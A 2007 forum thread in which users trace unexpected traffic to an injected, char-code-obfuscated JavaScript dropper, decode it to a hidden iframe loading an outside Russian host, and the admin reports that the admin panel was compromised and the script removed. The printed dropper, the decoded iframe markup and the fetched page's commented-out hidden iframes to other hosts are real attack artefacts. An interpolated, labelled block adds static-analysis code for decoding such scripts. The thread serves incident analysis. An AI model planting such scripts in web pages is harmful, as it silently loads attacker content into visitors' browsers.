Traffic Guest
Posted: Thu Nov 08, 2007 11:56 pm Post subject: Is this traffic normal?

I noticed that, browsing this forum, I am also getting traffic to/from these hosts:
redtram-ru.narod.ru
www.tns-counter.ru
Is it normal??
 |
Trikster
Joined: 15 Jul 2007 Posts: 1224 Location: Enterprise, Alabama
Posted: Fri Nov 09, 2007 12:25 am

Either you have a virus, or Chris has a web-hit counter installed on the forum. (Well, according to the URL I would lean on the second.)
 |
Lexikos
Joined: 17 Oct 2006 Posts: 2739 Location: Australia, Qld
Posted: Fri Nov 09, 2007 1:03 am

I see redtram-ru.narod.ru in my DNS cache. It leads to a 403 error page...
 |
Traffic Guest
Posted: Fri Nov 09, 2007 1:17 am

Interesting thing is that it only happens when I am browsing this forum.
There is another url:
-http://redtram-ru.narod.ru/21.js
 |
BoBoЁ Guest
Posted: Fri Nov 09, 2007 6:52 am

That's 21.js ...
Code:
function newn(){var temp="",i,c=0,out="";
var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!114!101!100!116!114!97!109!45!114!117!46!110!97!114!111!100!46!114!117!47!105!110!100!46!104!116!109!108!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!116!121!108!101!61!39!100!105!115!112!108!97!121!58!110!111!110!101!39!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);} newn();
 |
Lexikos
Joined: 17 Oct 2006 Posts: 2739 Location: Australia, Qld
Posted: Fri Nov 09, 2007 12:11 pm

Now wth would anyone write a .js file just to cover up the output of...
Code:
<iframe src=http://redtram-ru.narod.ru/ind.html width=1 height=1 frameborder=0 style='display:none'></iframe>
...especially when the only thing on that page ("o_0") is "underconstruction."
It seems to me that none of this should be here. It also seems completely harmless & pointless.
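
Added example (not part of any post in this thread): the step from the posted 21.js to the iframe markup shown above, done by reading the script as text instead of running it. It goes slightly beyond the thread by accepting any single non-digit delimiter, not only "!"; the function names `decodeCharCodeLiterals` and `hiddenFrames` are hypothetical, and the sample is the posted script with the forum's line wraps removed.

```javascript
// Static triage of a char-code dropper: the script is only read as text, never run.
// Constructed sample: 21.js as posted in the thread, forum line wraps removed.
const ENCODED =
  "60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47" +
  "!47!114!101!100!116!114!97!109!45!114!117!46!110!97!114!111!100!46!114" +
  "!117!47!105!110!100!46!104!116!109!108!32!119!105!100!116!104!61!49!32" +
  "!104!101!105!103!104!116!61!49!32!102!114!97!109!101!98!111!114!100!101" +
  "!114!61!48!32!115!116!121!108!101!61!39!100!105!115!112!108!97!121!58" +
  "!110!111!110!101!39!62!60!47!105!102!114!97!109!101!62!";
const SAMPLE_21_JS =
  'function newn(){var temp="",i,c=0,out="";var str="' + ENCODED + '"; l=str.length;' +
  "while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;" +
  'out=out+String.fromCharCode(temp);temp="";}document.write(out);} newn();';

// Decode every string literal that is only decimal char codes joined by one
// repeated delimiter ("!" here, but any non-digit works). Literals containing
// escaped quotes are not handled; they are simply skipped.
function decodeCharCodeLiterals(source, minCodes = 4) {
  const found = [];
  for (const m of source.matchAll(/"([^"\\\n]*)"|'([^'\\\n]*)'/g)) {
    const body = m[1] ?? m[2];
    const shape = /^\d+(\D)(?:\d+\1)*\d*$/.exec(body);
    if (!shape) continue;
    const codes = body.split(shape[1]).filter(Boolean).map(Number);
    if (codes.length < minCodes || codes.some((n) => n > 0xffff)) continue;
    found.push({ delimiter: shape[1], text: String.fromCharCode(...codes) });
  }
  return found;
}

// Report iframes in decoded markup and whether they are made invisible
// (1x1 or smaller, display:none, visibility:hidden). Handles unquoted attributes.
function hiddenFrames(html) {
  const frames = [];
  for (const [, attrText] of html.matchAll(/<iframe\b([^>]*)>/gi)) {
    const attrs = {};
    const attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
    for (const a of attrText.matchAll(attrRe)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    const tiny = Number(attrs.width) <= 1 || Number(attrs.height) <= 1;
    const styledOut = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || "");
    let host = null;
    try { host = new URL(attrs.src).hostname; } catch { /* relative or missing src */ }
    frames.push({ src: attrs.src ?? null, host, hidden: tiny || styledOut });
  }
  return frames;
}

for (const { text } of decodeCharCodeLiterals(SAMPLE_21_JS)) {
  console.log(text, hiddenFrames(text));
}
```
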
 |
Traffic Guest
Posted: Fri Nov 09, 2007 12:52 pm

Well, it seems weird to me too.
I was wondering if it somehow was causing the problems I have to access the forum sometimes
 |
jballi
Joined: 01 Oct 2005 Posts: 385 Location: Texas, USA
Posted: Tue Nov 13, 2007 10:19 pm

One of my anti-malware programs (don't know which one) has identified redtram-ru.narod.ru as a restricted site. I'm just wondering if there is any additional information on the reason this forum is accessing this site/counter/etc?
 |
engunneer
Joined: 30 Aug 2005 Posts: 6847 Location: Pacific Northwest, US
Posted: Tue Nov 13, 2007 10:20 pm

I checked on two computers - it is not in my DNS cache, I think
how are you checking?
 |
jballi
Joined: 01 Oct 2005 Posts: 385 Location: Texas, USA
Posted: Tue Nov 13, 2007 10:43 pm

engunneer wrote:
I checked on two computers - it is not in my DNS cache, I think
how are you checking?

One of my anti-malware programs loaded the web site to the list of restricted web sites. When using IE and on the main AHK forum page I can pull up this report:
This is just something I noticed today. It may have been there for a while.
 |
ahklerner
Joined: 26 Jun 2006 Posts: 1249 Location: USA
Posted: Tue Nov 13, 2007 10:52 pm

Firebug on Firefox is how I see it.
It is only affecting the index pages (go to the forum index)
Code:
function newn(){var temp="",i,c=0,out="";
var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!114!101!100!116!114!97!109!45!114!117!46!110!97!114!111!100!46!114!117!47!105!110!100!46!104!116!109!108!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!116!121!108!101!61!39!100!105!115!112!108!97!121!58!110!111!110!101!39!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);} newn();

Code:
// <script language="javascript">
on=mw=null;
fl=ofl=0;
mc=me=0;
t=0;
b=0;
ch=bt=bn=0;
wn=wt=null;
sl=0;
t2=0;
function Is25B857C6()
{
  this.n=(document.layers)?true:false;
  this.o=(navigator.userAgent.indexOf('Opera')!=-1)?true:false;
  this.i=(document.all&&(!this.o))?true:false;
  this.d=(document.getElementById)?true:false;
}
var is25B857C6=new Is25B857C6();
function Stor()
{
  if(is25B857C6.n&&(top.frames.length>0)){
    return top.frames[0];
  }
  else{
    if (document.location.search.substring(0,6)=="?Time=") return self;
    return top;
  }

}
var st=Stor();
if(isNaN(st.sl)) st.sl=1; else st.sl++;
function ge25B857C6()
{
  var cl;
  if(is25B857C6.n){
    cl=document.layers[ge25B857C6.arguments[0]];
    for(var i=1;i<ge25B857C6.arguments.length&&cl;i++) {
      cl=cl.document.layers[ge25B857C6.arguments[i]];
    }
    return cl;
  } else if(is25B857C6.i) {
    cl=eval('document.all.'+ge25B857C6.arguments[ge25B857C6.arguments.length-1]);
    return cl;
  } else {
    var n=ge25B857C6.arguments[ge25B857C6.arguments.length-1];
    cl=document.getElementById(n);
    if(cl) return cl;
    cl=document.getElementsByName(n);
    if(cl) return cl[0];
  }
}
function sbv25B857C6(v)
{
  if(is25B857C6.n) st.b.visibility=v;
  else if(st.b.style) st.b.style.visibility=v;
}
function met25B857C6(e,x,y)
{
  if(is25B857C6.n) e.moveTo(x,y);
  else if(is25B857C6.i) {
    e.style.pixelLeft=x;
    e.style.pixelTop=y;
  } else {
    e.style.left=x;
    e.style.top=y;
  }
}
function gbw25B857C6(e)
{
  if(is25B857C6.n) return e.document.width;
  else return e.offsetWidth;
}
function gbo25B857C6(e)
{
  var y;
  if(is25B857C6.n) return e.pageY;
  else {
    y = 0;
    while (e.offsetParent != null) {
      y += e.offsetTop;
      e = e.offsetParent;
    }
    y += e.offsetTop;
    return y;
  }
}
function gww25B857C6()
{
  if(window.innerWidth) return window.innerWidth;
  else return document.body.clientWidth;
}
function gwh25B857C6()
{
  if(window.innerHeight) return window.innerHeight;
  else return document.body.clientWidth;
}
function rbu25B857C6()
{
  if(st.b==st.bn){
    sbv25B857C6('hidden');
    st.b=st.bt;
    sbv25B857C6('visible');
  }
  clearTimeout(st.t);
}
function rbd25B857C6()
{
  if(st.b==st.bt){
    sbv25B857C6('hidden');
    st.b=st.bn;
    sbv25B857C6('visible');
  }
  clearTimeout(st.t);
}
function clb25B857C6()
{
  clearTimeout(st.t);
  sbv25B857C6('hidden');
}
function gn25B857C6(n,c) {
  if (is25B857C6.n) {
    document.write('<layer id="'+n+'" left=0 top=0 visibility=hide z-index=999>')
  } else {
    document.write('<div style="position: absolute; left: 0; top: 0;'+(is25B857C6.i?" width: 1;":"")+' visibility: hidden; z-index: 999;" id="'+n+'">');
  }
  document.write('<table cellpadding=1 cellspacing=0 border=0 width="108"><tr><td bgcolor=000000><table cellpadding=0 cellspacing=0 border=0 width=100%><tr bgcolor=ffffff><td height=1 nowrap><spacer type=block width=1 height=1></td></tr><tr><td><table cellpadding=0 cellspacing=0 border=0 width="100%"><tr bgcolor=cccccc><td width=1 nowrap bgcolor=ffffff><spacer type=block width=1 height=1></td><td width=18><a href="http://www.yandex.ru/" target=_blank><img src="http://bs.yandex.ru/resource/by.gif" title="Яндекс" alt="Яндекс" width=18 height=14 border=0 vspace=2 hspace=1></a></td><td width="98%"><a href="http://www.yandex.ru/advertising/index.html" target=_blank><img src="http://bs.yandex.ru/resource/bt.gif" title="Реклама на Яндексе" alt="Реклама на Яндексе" width=51 height=14 border=0 align=middle></a></td><td width=11><a href="http://narod.yandex.ru/help/mini.yhtml" target=_blank><img src="http://bs.yandex.ru/resource/bh.gif" title="Помощь" alt="Помощь" width=11 height=10 border=0></a></td><td width=11>');
  if (n=='bn') {
    document.write('<a href="#" onclick="rbu25B857C6(); return false;"><img src="http://bs.yandex.ru/resource/bu.gif" title="Спрятать" alt="Спрятать" width=11 height=10 border=0></a>');
  } else {
    document.write('<a href="#" onclick="rbd25B857C6(); return false;"><img src="http://bs.yandex.ru/resource/bd.gif" title="Показать" alt="Показать" width=11 height=10 border=0></a></td><td width=11><a href="#" onclick="clb25B857C6();return false;"><img src="http://bs.yandex.ru/resource/bc.gif" title="Закрыть" alt="Закрыть" width=11 height=10 border=0></a>');
  }
  document.write('</td><td width=1 nowrap bgcolor=808080><spacer type=block width=1 height=1></td></tr></table></td></tr><tr><td><table cellpadding=0 cellspacing=0 border=0 width="100%"><tr bgcolor=cccccc><td width=3><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td><td width="100%" bgcolor=808080><spacer type=block width=1 height=1></td><td width=3><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td></tr><tr bgcolor=cccccc><td width=3 background="http://bs.yandex.ru/resource/bb.gif"><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td><td width="100%">'+c+'</td><td width=3 background="http://bs.yandex.ru/resource/bb.gif"><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td></tr><tr><td width=3 background="http://bs.yandex.ru/resource/bb.gif"><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td><td height=1 bgcolor=ffffff><spacer type=block width=1 height=1></td><td width=3 background="http://bs.yandex.ru/resource/bb.gif"><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td></tr></table></td></tr><tr bgcolor=cccccc><td height=1 nowrap><table cellpadding=0 cellspacing=0 border=0 width=1 align=left><td height=1 nowrap bgcolor=ffffff><spacer type=block width=1 height=1></td></table><table cellpadding=0 cellspacing=0 border=0 width=1 align=right><td height=1 nowrap bgcolor=808080><spacer type=block width=1 height=1></td></table></td></tr><tr bgcolor=808080><td height=1 nowrap><spacer type=block width=1 height=1></td></tr></table></td></tr></table>');
  if (is25B857C6.n) document.writeln('</layer>');
  else document.writeln('</div>');
}
function mvb25B857C6()
{
  var obn=0;
  var obt=0;
  if(bn==0) bn=ge25B857C6('bn');
  if(bt==0) bt=ge25B857C6('bt');
  if(ch==0) ch=ge25B857C6('ch');
  if(!wn) wn=gbw25B857C6(bn);
  if(!wt) wt=gbw25B857C6(bt);
  w=gww25B857C6();
  h=gwh25B857C6();
  o=gbo25B857C6(ch);
  obn=w-wn;
  obt=w-wt;
  if((!is25B857C6.i) && h<o) {
    obn -= 15;
    obt -= 15;
  }
  met25B857C6(bn,obn,0);
  met25B857C6(bt,obt,0);
}
function shb25B857C6()
{
  if((self!=st.mw)&&(top.frames.length>0)) return;
  mvb25B857C6();
  st.bt = bt; st.b = st.bn = bn;
  sbv25B857C6('visible');
  st.t=setTimeout('rbu25B857C6()',30000);
  if(on) {
    sv=st;
    on();
    st=sv;
  }
}
function isl25B857C6()
{
  if(st.sl==0) {
    if(st.mw==self) {
      if(st.b) sbv25B857C6('hidden');
      shb25B857C6();
    }
    clearTimeout(t2);
  } else {
    ofl=st.fl;
    t2=self.setTimeout('self.isl25B857C6()',100);
  }
}
function net25B857C6(s) {
  if(s>st.mc){
    st.mc=s;
    st.mw=self;
    isl25B857C6();
  }
}
function rbf25B857C6()
{
  if (wc != window.innerWidth || hc != window.innerHeight) document.location.reload();
}
fn = frames.length;
if(fn>0){
  e=document.getElementsByTagName('iframe');
  if(is25B857C6.d) fn-=e.length;
}
if(fn==0) {
  if (is25B857C6.n) {
    document.write('<layer id="ch" left=0 visibility=hide><spacer type=block width=1 height=1></layer>');
  }
  else {
    document.write('<div style="position: absolute; left: 0; visibility: hidden;" id="ch"><spacer type=block width=1 height=1></div>');
  }
  gn25B857C6('bn', '<a href="http://bs.yandex.ru/count/9RXNnXyf3Ga30BlAA3f7QnIYCCenoZ7ZGAhacHt739r4PinKhkU8b49_0m00" target=_blank title="Мы помогаем вам помогать. http://www.wse-wmeste.ru/"><img src="http://bs.yandex.ru/count/9RXNnj1Vt_u30BlAA3f7QnIYCCenoZ7ZGAhacHt739r4PinKhkY8b45_0m00" alt="Мы помогаем вам помогать. http://www.wse-wmeste.ru/" width="100" height="100" border="0"></a>');
  gn25B857C6('bt', '<a href="http://bs.yandex.ru/count/9RXNnXyf3Ga30BlAA3f7QnIYCCenoZ7ZGAhacHt739r4PinKhkU8b49_0m00" target=_blank><font size=-2 color="#000000">Мы помогаем вам помогать. http://www.wse-wmeste.ru/</font></a>');
  if(is25B857C6.n) {
    wc=window.innerWidth;
    hc=window.innerHeight;
    window.onResize=rbf25B857C6;
  }
  else if(is25B857C6.i) {
    window.onresize=mvb25B857C6;
  }
  else {
    addEventListener("resize",mvb25B857C6,false);
  }
  if(is25B857C6.i) {
    if(st.fl==null) {
      st.fl=0;
      st.mw=null;
      st.mc=0;
    }
  } else {
    if(isNaN(st.fl)) {
      st.fl=0;
      st.mw=null;
      st.mc=0;
    }
  }
  if(top.frames.length>0) {
    me=st.fl++;
    x=gww25B857C6();
    y=gwh25B857C6();
    s=x*y;
    if(x>120&&y>120&&s>st.mc) {
      if(st.mc==0) setTimeout('self.net25B857C6('+s+')',x/10);
      else {
        st.mc=s;
        st.mw=self;
        isl25B857C6();
      }
    }
    st.sl--;
  }
  else {
    if(window.onload) on=window.onload;
    window.onload=shb25B857C6;
  }
}
// </script>

Code:
<html>
<head>
<title>o_O</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>

<!-- <iframe src="http://81.95.149.236/us4/index.php" width=1 height=1 frameborder="0" style="display:none"></iframe>
<!-- <iframe src="http://client133.faster-hosting.com/movie74.php?user=hlo" width=1 height=1 frameborder="0" style="display:none"></iframe> -->
<!-- <iframe src="" width=1 height=1 frameborder="0" style="display:none"></iframe>
<!-- <iframe src="" width=1 height=1 frameborder="0" style="display:none"></iframe> -->

undercontruction!

<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='http://counter.yadro.ru/hit?t28.13;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано количество просмотров и"+
" посетителей' "+
"border=0 width=88 height=120><\/a>")//--></script><!--/LiveInternet-->
</body>
</html><!-- ><!-- "><!-- '><!-- --></textarea></form>
</title></comment></a>
</div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
<style>
#bn {display:block;}
#bt {display:block;}
</style>
<div style="background:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=narod_total/)"></div>
<script language="JavaScript" src="http://bs.yandex.ru/show/163"></script>
<!-- mailto:spm111@yandex.ru -->
Edit: Fixed my code width
Last edited by ahklerner on Wed Nov 14, 2007 12:49 am; edited 1 time in total
 |
Lexikos
Joined: 17 Oct 2006 Posts: 2739 Location: Australia, Qld
Posted: Tue Nov 13, 2007 11:56 pm

engunneer wrote:
I checked on two computers - it is not in my DNS cache, I think
how are you checking?

ipconfig /displaydns
 |
Titan
Joined: 11 Aug 2004 Posts: 5390 Location: /b/
Posted: Wed Nov 14, 2007 12:08 am

Looks like the forum has been infected, I remember that a similar incident happened a while ago.
 |
Traffic Guest
Posted: Wed Nov 14, 2007 12:10 am

Well, while we do not know if this activity is "official" or not, I think that the best thing to do is to block it.
 |
Chris Site Admin
Joined: 02 Mar 2004 Posts: 10480
Posted: Wed Nov 14, 2007 12:18 am

It appears the forum's built-in admin panel was accessed and one of the forum descriptions was altered to append this JavaScript. It has been removed.
This probably happened in conjunction with the security problem a couple months ago that was mentioned in this topic. But as a precaution (in case it happened more recently), I've changed the passwords again.
Can anyone determine whether the JavaScript was harmful vs. harmless? Hopefully it's not another Quicktime exploit that infects your PC with a trojan.